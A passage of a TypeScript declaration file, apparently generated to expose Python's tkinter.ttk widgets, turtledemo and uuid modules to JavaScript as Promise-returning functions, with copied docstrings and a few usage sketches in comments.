Promise<any>\n\t\t\tpane$({ pane, option }: { pane, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If newpos is specified, sets the position of sash number index.\n\t\t\t * \n\t\t\t * May adjust the positions of adjacent sashes to ensure that\n\t\t\t * positions are monotonically increasing. Sash positions are further\n\t\t\t * constrained to be between 0 and the total size of the widget.\n\t\t\t * \n\t\t\t * Returns the new position of sash number index.\n\t\t\t */\n\t\t\tsashpos(index, newpos?): Promise<any>\n\t\t\tsashpos$({ index, newpos }: { index, newpos?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Progressbar widget shows the status of a long-running\n\t\t * operation. 
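/* Sketch: the Panedwindow insert()/sashpos() methods above (same assumptions
 * as the earlier sketches; sash positions only become meaningful once the
 * widget has been laid out).
 *
 *   const pw = await ttk.Panedwindow$({ master: root, orient: 'horizontal' })
 *   await pw.insert('end', await ttk.Frame(pw))
 *   await pw.insert('end', await ttk.Frame(pw))
 *   console.log(await pw.sashpos(0))   // x position of the sash between the panes
 */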
They can operate in two modes: determinate mode shows the\n\t\t * amount completed relative to the total amount of work to be done, and\n\t\t * indeterminate mode provides an animated display to let the user know\n\t\t * that something is happening.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Progressbar with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient, length, mode, maximum, value, variable, phase\n\t\t * \n\t\t */\n\t\tfunction Progressbar(master?): Promise<IProgressbar>\n\t\tfunction Progressbar$({ master }: { master?}): Promise<IProgressbar>\n\t\tinterface IProgressbar extends IWidget {\n\n\t\t\t/**\n\t\t\t * Begin autoincrement mode: schedules a recurring timer event\n\t\t\t * that calls method step every interval milliseconds.\n\t\t\t * \n\t\t\t * interval defaults to 50 milliseconds (20 steps/second) if omitted.\n\t\t\t */\n\t\t\tstart(interval?): Promise<any>\n\t\t\tstart$({ interval }: { interval?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Increments the value option by amount.\n\t\t\t * \n\t\t\t * amount defaults to 1.0 if omitted.\n\t\t\t */\n\t\t\tstep(amount?): Promise<any>\n\t\t\tstep$({ amount }: { amount?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Stop autoincrement mode: cancels any recurring timer event\n\t\t\t * initiated by start.\n\t\t\t */\n\t\t\tstop(): Promise<any>\n\t\t\tstop$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Radiobutton widgets are used in groups to show or change a\n\t\t * set of mutually-exclusive options.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Radiobutton with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, value, variable\n\t\t * \n\t\t */\n\t\tfunction Radiobutton(master?): Promise<IRadiobutton>\n\t\tfunction Radiobutton$({ master }: { master?}): Promise<IRadiobutton>\n\t\tinterface IRadiobutton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Sets the option variable to the option value, selects the\n\t\t\t * widget, and invokes the associated command.\n\t\t\t * \n\t\t\t * Returns the result of the command, or an empty string if\n\t\t\t * no command is specified.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Scale widget is typically used to control the numeric value of\n\t\t * a linked variable that varies uniformly over some range.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Scale with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, from, length, orient, to, value, variable\n\t\t * \n\t\t */\n\t\tfunction Scale(master?): Promise<IScale>\n\t\tfunction Scale$({ master }: { master?}): Promise<IScale>\n\t\tinterface IScale extends IWidget {\n\n\t\t\t/**\n\t\t\t * Modify or query scale options.\n\t\t\t * \n\t\t\t * Setting a value for any of the \"from\", \"from_\" or \"to\" options\n\t\t\t * generates a <<RangeChanged>> event.\n\t\t\t */\n\t\t\tconfigure(cnf?): Promise<any>\n\t\t\tconfigure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the current value of the value option, or the value\n\t\t\t * corresponding to the coordinates x, y if they are specified.\n\t\t\t * \n\t\t\t * x and y are pixel coordinates relative to the scale widget\n\t\t\t * origin.\n\t\t\t 
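/* Sketch: determinate-mode stepping per the Progressbar docs above (same
 * assumptions; `mode` and `maximum` are Tk options not spelled out in the
 * generated `$` signature).
 *
 *   const bar = await ttk.Progressbar$({ master: root, mode: 'determinate', maximum: 100 })
 *   await bar.step(25)     // value option -> 25
 *   await bar.start(100)   // auto-step every 100 ms until...
 *   await bar.stop()       // ...cancelled here
 */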
*/\n\t\t\tget(x?, y?): Promise<any>\n\t\t\tget$({ x, y }: { x?, y?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Scrollbar controls the viewport of a scrollable widget.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Scrollbar with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, orient\n\t\t * \n\t\t */\n\t\tfunction Scrollbar(master?): Promise<IScrollbar>\n\t\tfunction Scrollbar$({ master }: { master?}): Promise<IScrollbar>\n\t\tinterface IScrollbar extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Separator widget displays a horizontal or vertical separator\n\t\t * bar.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Separator with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient\n\t\t * \n\t\t */\n\t\tfunction Separator(master?): Promise<ISeparator>\n\t\tfunction Separator$({ master }: { master?}): Promise<ISeparator>\n\t\tinterface ISeparator extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Sizegrip allows the user to resize the containing toplevel\n\t\t * window by pressing and dragging the grip.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Sizegrip with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, state, style, takefocus\n\t\t * \n\t\t */\n\t\tfunction Sizegrip(master?): Promise<ISizegrip>\n\t\tfunction Sizegrip$({ master }: { master?}): Promise<ISizegrip>\n\t\tinterface ISizegrip extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Spinbox is an Entry with increment and decrement arrows\n\t\t * \n\t\t * It is commonly used for number entry or to select from a list of\n\t\t * string values.\n\t\t * \n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Spinbox widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, validate,\n\t\t * validatecommand, xscrollcommand, invalidcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * to, from_, increment, values, wrap, format, command\n\t\t * \n\t\t */\n\t\tfunction Spinbox(master?): Promise<ISpinbox>\n\t\tfunction Spinbox$({ master }: { master?}): Promise<ISpinbox>\n\t\tinterface ISpinbox extends IEntry {\n\n\t\t\t/**\n\t\t\t * Sets the value of the Spinbox to value.\n\t\t\t */\n\t\t\tset(value): Promise<any>\n\t\t\tset$({ value }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Treeview widget displays a hierarchical collection of items.\n\t\t * \n\t\t * Each item has a textual label, an optional image, and an optional list\n\t\t * of data values. 
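/* Sketch: the Spinbox above -- an Entry with arrows (same assumptions; note
 * that Python spells the lower bound `from_` because `from` is a keyword).
 *
 *   const spin = await ttk.Spinbox$({ master: root, from_: 0, to: 10, increment: 2 })
 *   await spin.set(4)
 *   console.log(await spin.get())   // '4' -- get() inherited from the Tk entry
 */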
The data values are displayed in successive columns\n\t\t * after the tree label.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Treeview with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, xscrollcommand,\n\t\t * yscrollcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * columns, displaycolumns, height, padding, selectmode, show\n\t\t * \n\t\t * ITEM OPTIONS\n\t\t * \n\t\t * text, image, values, open, tags\n\t\t * \n\t\t * TAG OPTIONS\n\t\t * \n\t\t * foreground, background, font, image\n\t\t * \n\t\t */\n\t\tfunction Treeview(master?): Promise<ITreeview>\n\t\tfunction Treeview$({ master }: { master?}): Promise<ITreeview>\n\t\tinterface ITreeview extends IWidget {\n\n\t\t\t/**\n\t\t\t * Returns the bounding box (relative to the treeview widget's\n\t\t\t * window) of the specified item in the form x y width height.\n\t\t\t * \n\t\t\t * If column is specified, returns the bounding box of that cell.\n\t\t\t * If the item is not visible (i.e., if it is a descendant of a\n\t\t\t * closed item or is scrolled offscreen), returns an empty string.\n\t\t\t */\n\t\t\tbbox(item, column?): Promise<any>\n\t\t\tbbox$({ item, column }: { item, column?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a tuple of children belonging to item.\n\t\t\t * \n\t\t\t * If item is not specified, returns root children.\n\t\t\t */\n\t\t\tget_children(item?): Promise<any>\n\t\t\tget_children$({ item }: { item?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Replaces item's child with newchildren.\n\t\t\t * \n\t\t\t * Children present in item that are not present in newchildren\n\t\t\t * are detached from tree. No items in newchildren may be an\n\t\t\t * ancestor of item.\n\t\t\t */\n\t\t\tset_children(item): Promise<any>\n\t\t\tset_children$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified column.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the column option values. If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t */\n\t\t\tcolumn(column, option?): Promise<any>\n\t\t\tcolumn$({ column, option }: { column, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete all specified items and all their descendants. The root\n\t\t\t * item may not be deleted.\n\t\t\t */\n\t\t\tdelete(): Promise<any>\n\t\t\tdelete$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Unlinks all of the specified items from the tree.\n\t\t\t * \n\t\t\t * The items and all of their descendants are still present, and may\n\t\t\t * be reinserted at another point in the tree, but will not be\n\t\t\t * displayed. The root item may not be detached.\n\t\t\t */\n\t\t\tdetach(): Promise<any>\n\t\t\tdetach$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns True if the specified item is present in the tree,\n\t\t\t * False otherwise.\n\t\t\t */\n\t\t\texists(item): Promise<any>\n\t\t\texists$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * If item is specified, sets the focus item to item. Otherwise,\n\t\t\t * returns the current focus item, or '' if there is none.\n\t\t\t */\n\t\t\tfocus(item?): Promise<any>\n\t\t\tfocus$({ item }: { item?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the heading options for the specified column.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the heading option values. 
If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t * \n\t\t\t * Valid options/values are:\n\t\t\t * text: text\n\t\t\t * The text to display in the column heading\n\t\t\t * image: image_name\n\t\t\t * Specifies an image to display to the right of the column\n\t\t\t * heading\n\t\t\t * anchor: anchor\n\t\t\t * Specifies how the heading text should be aligned. One of\n\t\t\t * the standard Tk anchor values\n\t\t\t * command: callback\n\t\t\t * A callback to be invoked when the heading label is\n\t\t\t * pressed.\n\t\t\t * \n\t\t\t * To configure the tree column heading, call this with column = \"#0\" \n\t\t\t */\n\t\t\theading(column, option?): Promise<any>\n\t\t\theading$({ column, option }: { column, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a description of the specified component under the\n\t\t\t * point given by x and y, or the empty string if no such component\n\t\t\t * is present at that position.\n\t\t\t */\n\t\t\tidentify(component, x, y): Promise<any>\n\t\t\tidentify$({ component, x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the item ID of the item at position y.\n\t\t\t */\n\t\t\tidentify_row(y): Promise<any>\n\t\t\tidentify_row$({ y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the data column identifier of the cell at position x.\n\t\t\t * \n\t\t\t * The tree column has ID #0.\n\t\t\t */\n\t\t\tidentify_column(x): Promise<any>\n\t\t\tidentify_column$({ x }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns one of:\n\t\t\t * \n\t\t\t * heading: Tree heading area.\n\t\t\t * separator: Space between two columns headings;\n\t\t\t * tree: The tree area.\n\t\t\t * cell: A data cell.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\tidentify_region(x, y): Promise<any>\n\t\t\tidentify_region$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the element at position x, y.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\tidentify_element(x, y): Promise<any>\n\t\t\tidentify_element$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the integer index of item within its parent's list\n\t\t\t * of children.\n\t\t\t */\n\t\t\tindex(item): Promise<any>\n\t\t\tindex$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Creates a new item and return the item identifier of the newly\n\t\t\t * created item.\n\t\t\t * \n\t\t\t * parent is the item ID of the parent item, or the empty string\n\t\t\t * to create a new top-level item. index is an integer, or the value\n\t\t\t * end, specifying where in the list of parent's children to insert\n\t\t\t * the new item. If index is less than or equal to zero, the new node\n\t\t\t * is inserted at the beginning, if index is greater than or equal to\n\t\t\t * the current number of children, it is inserted at the end. If iid\n\t\t\t * is specified, it is used as the item identifier, iid must not\n\t\t\t * already exist in the tree. Otherwise, a new unique identifier\n\t\t\t * is generated.\n\t\t\t */\n\t\t\tinsert(parent, index, iid?): Promise<any>\n\t\t\tinsert$({ parent, index, iid }: { parent, index, iid?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified item.\n\t\t\t * \n\t\t\t * If no options are given, a dict with options/values for the item\n\t\t\t * is returned. If option is specified then the value for that option\n\t\t\t * is returned. 
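/* Sketch: building rows with insert()/heading() as documented above. The
 * `insert$(positional..., { keywords })` mixed call form is an assumption
 * based on the project README; other assumptions as in the Style sketch.
 *
 *   const tree = await ttk.Treeview$({ master: root, columns: ['size'] })
 *   await tree.heading$('#0', { text: 'Name' })   // '#0' is the tree column
 *   const iid = await tree.insert$('', 'end', { text: 'a.txt', values: ['12 kB'] })
 *   console.log(await tree.index(iid))            // 0 -- first child of the root
 */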
Otherwise, sets the options to the corresponding\n\t\t\t * values as given by kw.\n\t\t\t */\n\t\t\titem(item, option?): Promise<any>\n\t\t\titem$({ item, option }: { item, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves item to position index in parent's list of children.\n\t\t\t * \n\t\t\t * It is illegal to move an item under one of its descendants. If\n\t\t\t * index is less than or equal to zero, item is moved to the\n\t\t\t * beginning; if greater than or equal to the number of children,\n\t\t\t * it is moved to the end. If item was detached it is reattached.\n\t\t\t */\n\t\t\tmove(item, parent, index): Promise<any>\n\t\t\tmove$({ item, parent, index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the identifier of item's next sibling, or '' if item\n\t\t\t * is the last child of its parent.\n\t\t\t */\n\t\t\tnext(item): Promise<any>\n\t\t\tnext$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the ID of the parent of item, or '' if item is at the\n\t\t\t * top level of the hierarchy.\n\t\t\t */\n\t\t\tparent(item): Promise<any>\n\t\t\tparent$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the identifier of item's previous sibling, or '' if\n\t\t\t * item is the first child of its parent.\n\t\t\t */\n\t\t\tprev(item): Promise<any>\n\t\t\tprev$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Ensure that item is visible.\n\t\t\t * \n\t\t\t * Sets all of item's ancestors' open option to True, and scrolls\n\t\t\t * the widget if necessary so that item is within the visible\n\t\t\t * portion of the tree.\n\t\t\t */\n\t\t\tsee(item): Promise<any>\n\t\t\tsee$({ item }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the tuple of selected items.\n\t\t\t */\n\t\t\tselection(): Promise<any>\n\t\t\tselection$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * The specified items become the new selection.\n\t\t\t */\n\t\t\tselection_set(): Promise<any>\n\t\t\tselection_set$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Add all of the specified items to the selection.\n\t\t\t */\n\t\t\tselection_add(): Promise<any>\n\t\t\tselection_add$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Remove all of the specified items from the selection.\n\t\t\t */\n\t\t\tselection_remove(): Promise<any>\n\t\t\tselection_remove$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Toggle the selection state of each specified item.\n\t\t\t */\n\t\t\tselection_toggle(): Promise<any>\n\t\t\tselection_toggle$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or set the value of the given item.\n\t\t\t * \n\t\t\t * With one argument, return a dictionary of column/value pairs\n\t\t\t * for the specified item. With two arguments, return the current\n\t\t\t * value of the specified column. 
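/* Sketch: selection and per-cell values, continuing the Treeview example
 * above (same assumptions; `iid` is the identifier returned by insert()).
 *
 *   await tree.selection_set(iid)
 *   console.log(await tree.selection())        // (iid,)
 *   await tree.set(iid, 'size', '14 kB')       // three-arg form writes the cell
 *   console.log(await tree.set(iid, 'size'))   // '14 kB'
 */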
With three arguments, set the\n\t\t\t * value of given column in given item to the specified value.\n\t\t\t */\n\t\t\tset(item, column?, value?): Promise<any>\n\t\t\tset$({ item, column, value }: { item, column?, value?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Bind a callback for the given event sequence to the tag tagname.\n\t\t\t * When an event is delivered to an item, the callbacks for each\n\t\t\t * of the item's tags option are called.\n\t\t\t */\n\t\t\ttag_bind(tagname, sequence?, callback?): Promise<any>\n\t\t\ttag_bind$({ tagname, sequence, callback }: { tagname, sequence?, callback?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options for the specified tagname.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the option settings for tagname.\n\t\t\t * If option is specified, returns the value for that option for the\n\t\t\t * specified tagname. Otherwise, sets the options to the corresponding\n\t\t\t * values for the given tagname.\n\t\t\t */\n\t\t\ttag_configure(tagname, option?): Promise<any>\n\t\t\ttag_configure$({ tagname, option }: { tagname, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If item is specified, returns 1 or 0 depending on whether the\n\t\t\t * specified item has the given tagname. Otherwise, returns a list of\n\t\t\t * all items which have the specified tag.\n\t\t\t * \n\t\t\t * * Availability: Tk 8.6\n\t\t\t */\n\t\t\ttag_has(tagname, item?): Promise<any>\n\t\t\ttag_has$({ tagname, item }: { tagname, item?}): Promise<any>\n\t\t\treattach\n\t\t}\n\n\t\t/**\n\t\t * A Ttk Scale widget with a Ttk Label widget indicating its\n\t\t * current value.\n\t\t * \n\t\t * The Ttk Scale can be accessed through instance.scale, and Ttk Label\n\t\t * can be accessed through instance.label\n\t\t */\n\n\t\t/**\n\t\t * Construct a horizontal LabeledScale with parent master, a\n\t\t * variable to be associated with the Ttk Scale widget and its range.\n\t\t * If variable is not specified, a tkinter.IntVar is created.\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * compound: 'top' or 'bottom'\n\t\t * Specifies how to display the label relative to the scale.\n\t\t * Defaults to 'top'.\n\t\t * \n\t\t */\n\t\tfunction LabeledScale(master?, variable?, from_?, to?): Promise<ILabeledScale>\n\t\tfunction LabeledScale$({ master, variable, from_, to }: { master?, variable?, from_?, to?}): Promise<ILabeledScale>\n\t\tinterface ILabeledScale extends IFrame {\n\n\t\t\t/**\n\t\t\t * Destroy this widget and possibly its associated variable.\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return current scale value.\n\t\t\t */\n\t\t\tvalue(): Promise<any>\n\t\t\tvalue$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set new scale value.\n\t\t\t */\n\t\t\tvalue(val): Promise<any>\n\t\t\tvalue$({ val }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Themed OptionMenu, based after tkinter's OptionMenu, which allows\n\t\t * the user to select a value from a menu.\n\t\t */\n\n\t\t/**\n\t\t * Construct a themed OptionMenu widget with master as the parent,\n\t\t * the resource textvariable set to variable, the initially selected\n\t\t * value specified by the default parameter, the menu values given by\n\t\t * *values and additional keywords.\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * style: stylename\n\t\t * Menubutton style.\n\t\t * direction: 'above', 'below', 'left', 'right', or 'flush'\n\t\t * Menubutton direction.\n\t\t * command: callback\n\t\t * A callback that will be invoked after selecting an 
item.\n\t\t * \n\t\t */\n\t\tfunction OptionMenu(master, variable, def?): Promise<IOptionMenu>\n\t\tfunction OptionMenu$({ master, variable, def }: { master, variable, def?}): Promise<IOptionMenu>\n\t\tinterface IOptionMenu extends IMenubutton {\n\n\t\t\t/**\n\t\t\t * Build a new menu of radiobuttons with *values and optionally\n\t\t\t * a default value.\n\t\t\t */\n\t\t\tset_menu(def?): Promise<any>\n\t\t\tset_menu$({ def }: { def?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Destroy this widget and its associated variable.\n\t\t\t */\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\t\tlet LabelFrame: Promise<any>\n\t\tlet PanedWindow: Promise<any>\n\t}\n}\ndeclare module turtledemo {\n\tmodule chaos {\n\t\tvar _\n\t\tfunction f(x): Promise<any>\n\t\tfunction f$({ x }): Promise<any>\n\t\tfunction g(x): Promise<any>\n\t\tfunction g$({ x }): Promise<any>\n\t\tfunction h(x): Promise<any>\n\t\tfunction h$({ x }): Promise<any>\n\t\tfunction jumpto(x, y): Promise<any>\n\t\tfunction jumpto$({ x, y }): Promise<any>\n\t\tfunction line(x1, y1, x2, y2): Promise<any>\n\t\tfunction line$({ x1, y1, x2, y2 }): Promise<any>\n\t\tfunction coosys(): Promise<any>\n\t\tfunction coosys$($: {}): Promise<any>\n\t\tfunction plot(fun, start, color): Promise<any>\n\t\tfunction plot$({ fun, start, color }): Promise<any>\n\t\tfunction main(): Promise<any>\n\t\tfunction main$($: {}): Promise<any>\n\t\tlet N: Promise<any>\n\t}\n}\ndeclare module uuid {\n\tvar _\n\n\t/**\n\t * Get the hardware address as a 48-bit positive integer.\n\t * \n\t * The first time this runs, it may launch a separate program, which could\n\t * be quite slow. If all attempts to obtain the hardware address fail, we\n\t * choose a random 48-bit number with its eighth bit set to 1 as recommended\n\t * in RFC 4122.\n\t * \n\t */\n\tfunction getnode(): Promise<any>\n\tfunction getnode$($: {}): Promise<any>\n\n\t/**\n\t * Generate a UUID from a host ID, sequence number, and the current time.\n\t * If 'node' is not given, getnode() is used to obtain the hardware\n\t * address. If 'clock_seq' is given, it is used as the sequence number;\n\t * otherwise a random 14-bit sequence number is chosen.\n\t */\n\tfunction uuid1(node?, clock_seq?): Promise<any>\n\tfunction uuid1$({ node, clock_seq }: { node?, clock_seq?}): Promise<any>\n\n\t/**\n\t * Generate a UUID from the MD5 hash of a namespace UUID and a name.\n\t */\n\tfunction uuid3(namespace, name): Promise<any>\n\tfunction uuid3$({ namespace, name }): Promise<any>\n\n\t/**\n\t * Generate a random UUID.\n\t */\n\tfunction uuid4(): Promise<any>\n\tfunction uuid4$($: {}): Promise<any>\n\n\t/**\n\t * Generate a UUID from the SHA-1 hash of a namespace UUID and a name.\n\t */\n\tfunction uuid5(namespace, name): Promise<any>\n\tfunction uuid5$({ namespace, name }): Promise<any>\n\tinterface ISafeUUID {\n\t\tsafe\n\t\tunsafe\n\t\tunknown\n\t}\n\n\t/**\n\t * Instances of the UUID class represent UUIDs as specified in RFC 4122.\n\t * UUID objects are immutable, hashable, and usable as dictionary keys.\n\t * Converting a UUID to a string with str() yields something in the form\n\t * '12345678-1234-1234-1234-123456789abc'. 
The UUID constructor accepts\n\t * five possible forms: a similar string of hexadecimal digits, or a tuple\n\t * of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and\n\t * 48-bit values respectively) as an argument named 'fields', or a string\n\t * of 16 bytes (with all the integer fields in big-endian order) as an\n\t * argument named 'bytes', or a string of 16 bytes (with the first three\n\t * fields in little-endian order) as an argument named 'bytes_le', or a\n\t * single 128-bit integer as an argument named 'int'.\n\t * \n\t * UUIDs have these read-only attributes:\n\t * \n\t * bytes the UUID as a 16-byte string (containing the six\n\t * integer fields in big-endian byte order)\n\t * \n\t * bytes_le the UUID as a 16-byte string (with time_low, time_mid,\n\t * and time_hi_version in little-endian byte order)\n\t * \n\t * fields a tuple of the six integer fields of the UUID,\n\t * which are also available as six individual attributes\n\t * and two derived attributes:\n\t * \n\t * time_low the first 32 bits of the UUID\n\t * time_mid the next 16 bits of the UUID\n\t * time_hi_version the next 16 bits of the UUID\n\t * clock_seq_hi_variant the next 8 bits of the UUID\n\t * clock_seq_low the next 8 bits of the UUID\n\t * node the last 48 bits of the UUID\n\t * \n\t * time the 60-bit timestamp\n\t * clock_seq the 14-bit sequence number\n\t * \n\t * hex the UUID as a 32-character hexadecimal string\n\t * \n\t * int the UUID as a 128-bit integer\n\t * \n\t * urn the UUID as a URN as specified in RFC 4122\n\t * \n\t * variant the UUID variant (one of the constants RESERVED_NCS,\n\t * RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)\n\t * \n\t * version the UUID version number (1 through 5, meaningful only\n\t * when the variant is RFC_4122)\n\t * \n\t * is_safe An enum indicating whether the UUID has been generated in\n\t * a way that is safe for multiprocessing applications, via\n\t * uuid_generate_time_safe(3).\n\t * \n\t */\n\n\t/**\n\t * Create a UUID from either a string of 32 hexadecimal digits,\n\t * a string of 16 bytes as the 'bytes' argument, a string of 16 bytes\n\t * in little-endian order as the 'bytes_le' argument, a tuple of six\n\t * integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,\n\t * 8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as\n\t * the 'fields' argument, or a single 128-bit integer as the 'int'\n\t * argument. When a string of hex digits is given, curly braces,\n\t * hyphens, and a URN prefix are all optional. For example, these\n\t * expressions all yield the same UUID:\n\t * \n\t * UUID('{12345678-1234-5678-1234-567812345678}')\n\t * UUID('12345678123456781234567812345678')\n\t * UUID('urn:uuid:12345678-1234-5678-1234-567812345678')\n\t * UUID(bytes='\\x12\\x34\\x56\\x78'*4)\n\t * UUID(bytes_le='\\x78\\x56\\x34\\x12\\x34\\x12\\x78\\x56' +\n\t * '\\x12\\x34\\x56\\x78\\x12\\x34\\x56\\x78')\n\t * UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))\n\t * UUID(int=0x12345678123456781234567812345678)\n\t * \n\t * Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must\n\t * be given. The 'version' argument is optional; if given, the resulting\n\t * UUID will have its variant and version set according to RFC 4122,\n\t * overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.\n\t * \n\t * is_safe is an enum exposed as an attribute on the instance. 
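/* Sketch: the uuid functions and UUID constructor forms described above,
 * driven over the bridge (entry-point assumptions as in the earlier
 * sketches; attribute reads like `.hex` resolve when awaited).
 *
 *   const uuid = await python('uuid')
 *   const u4 = await uuid.uuid4()
 *   console.log(await u4.hex)                              // 32 hex digits
 *   const u5 = await uuid.uuid5(await uuid.NAMESPACE_DNS, 'example.org')
 *   const copy = await uuid.UUID$({ hex: await u4.hex })   // round-trip via 'hex'
 *   console.log(await copy.urn)                            // 'urn:uuid:...'
 *   python.exit()
 */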
It\n\t * indicates whether the UUID has been generated in a way that is safe\n\t * for multiprocessing applications, via uuid_generate_time_safe(3).\n\t * \n\t */\n\tfunction UUID(hex?, bytes?, bytes_le?, fields?, int?, version?): Promise<IUUID>\n\tfunction UUID$({ hex, bytes, bytes_le, fields, int, version }: { hex?, bytes?, bytes_le?, fields?, int?, version?}): Promise<IUUID>\n\tinterface IUUID {\n\t\tbytes(): Promise<any>\n\t\tbytes$($: {}): Promise<any>\n\t\tbytes_le(): Promise<any>\n\t\tbytes_le$($: {}): Promise<any>\n\t\tfields(): Promise<any>\n\t\tfields$($: {}): Promise<any>\n\t\ttime_low(): Promise<any>\n\t\ttime_low$($: {}): Promise<any>\n\t\ttime_mid(): Promise<any>\n\t\ttime_mid$($: {}): Promise<any>\n\t\ttime_hi_version(): Promise<any>\n\t\ttime_hi_version$($: {}): Promise<any>\n\t\tclock_seq_hi_variant(): Promise<any>\n\t\tclock_seq_hi_variant$($: {}): Promise<any>\n\t\tclock_seq_low(): Promise<any>\n\t\tclock_seq_low$($: {}): Promise<any>\n\t\ttime(): Promise<any>\n\t\ttime$($: {}): Promise<any>\n\t\tclock_seq(): 